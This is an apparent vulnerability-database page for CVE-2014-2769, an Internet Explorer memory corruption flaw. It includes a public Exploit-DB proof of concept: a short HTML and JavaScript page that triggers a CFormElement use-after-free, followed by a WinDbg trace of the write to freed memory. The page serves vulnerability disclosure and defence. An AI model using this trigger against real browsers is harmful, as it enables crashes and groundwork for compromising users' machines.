CVE-2014-2769

critical

Published 2014-06-11 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

10.0

Description

Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-1772, CVE-2014-1780, CVE-2014-1794, CVE-2014-1797, CVE-2014-1802, CVE-2014-2756, CVE-2014-2763, CVE-2014-2764, and CVE-2014-2771.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-34010 dos windows_x86 text · 4 KB

Drozdova Liudmila · 2014-07-08

Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)

text exploit Source: Exploit-DB

<!--
Exploit Title: MS14-035 Internet Explorer CFormElement Use-after-free and memory corruption POC (no crash! see trace)
Product: Internet Explorer
Vulnerable version: 9,10
Date: 8.07.2014
Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
Vendor Homepage: http://www.microsoft.com/
Tested on: Window 7 SP1 x86 IE 9,10
CVE : unknown
-->
<html>

<body>


<form id="form1">
   <input id="input1" type="text" value="">
</form>


<script>

	loaded = false ;

function func()	{

	if (loaded)	{
		document.body.innerHTML = "" ; // free CFormElement
	}

}

    
	input1 = document.getElementById("input1") ;
	input1.onclick = func ;
	loaded = true ;
	input1.click(); // Call DoClick function
	
	


</script>
</body>

</html>
<!--
Vulnerability details

MSHTML!CInput::DoClick

66943670 8bcf            mov     ecx,edi
66943672 ff751c          push    dword ptr [ebp+1Ch]
66943675 ff7518          push    dword ptr [ebp+18h]
66943678 ff7514          push    dword ptr [ebp+14h]
6694367b ff7510          push    dword ptr [ebp+10h]
6694367e ff750c          push    dword ptr [ebp+0Ch]
66943681 ff7508          push    dword ptr [ebp+8]  <---- esi = CFormElement
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf) <--- call of func() in javascript, free esi
66943689 85db            test    ebx,ebx 
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001 ; memory corruption, write to freed memory
66943691 836668fe        and     dword ptr [esi+68h],0FFFFFFFEh  ; memory corruption, write to freed memory

 MSHTML!CInput::DoClick+0x60:
66943681 ff7508          push    dword ptr [ebp+8]    ss:0023:023ec994=00000000
0:005> p
eax=00000001 ebx=00000001 ecx=00317540 edx=66943621 esi=0034cd20 edi=00317540
eip=66943684 esp=023ec95c ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x63:
66943684 e856e4f3ff      call    MSHTML!CElement::DoClick (66881adf)
0:005> dds esi l1
0034cd20  6661ead8 MSHTML!CFormElement::`vftable'



0:005> !heap -x esi <-- esi contains valid pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            c  LFH;busy 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=66943689 esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
MSHTML!CInput::DoClick+0x68:
66943689 85db            test    ebx,ebx
0:005> dds esi l1
0034cd20  6661005c MSHTML!CSVGPathSegCurvetoCubicAbs::`vftable'+0x12c




0:005> !heap -x esi <-- esi contains freed pointer to CFormElement
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0034cd18  0034cd20  00270000  002fcee8        78      -            0  LFH;free 

0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368b esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6a:
6694368b 7408            je      MSHTML!CInput::DoClick+0x74 (66943695)  [br=0]
0:005> p
eax=00000000 ebx=00000001 ecx=00000000 edx=66408ac8 esi=0034cd20 edi=00317540
eip=6694368d esp=023ec978 ebp=023ec98c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MSHTML!CInput::DoClick+0x6c:
6694368d 83666400        and     dword ptr [esi+64h],0 ds:0023:0034cd84=00000001


-->

Application impact

Vendor	Product	Versions	Fixed
microsoft	internet_explorer	`10`
microsoft	internet_explorer	`11`

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.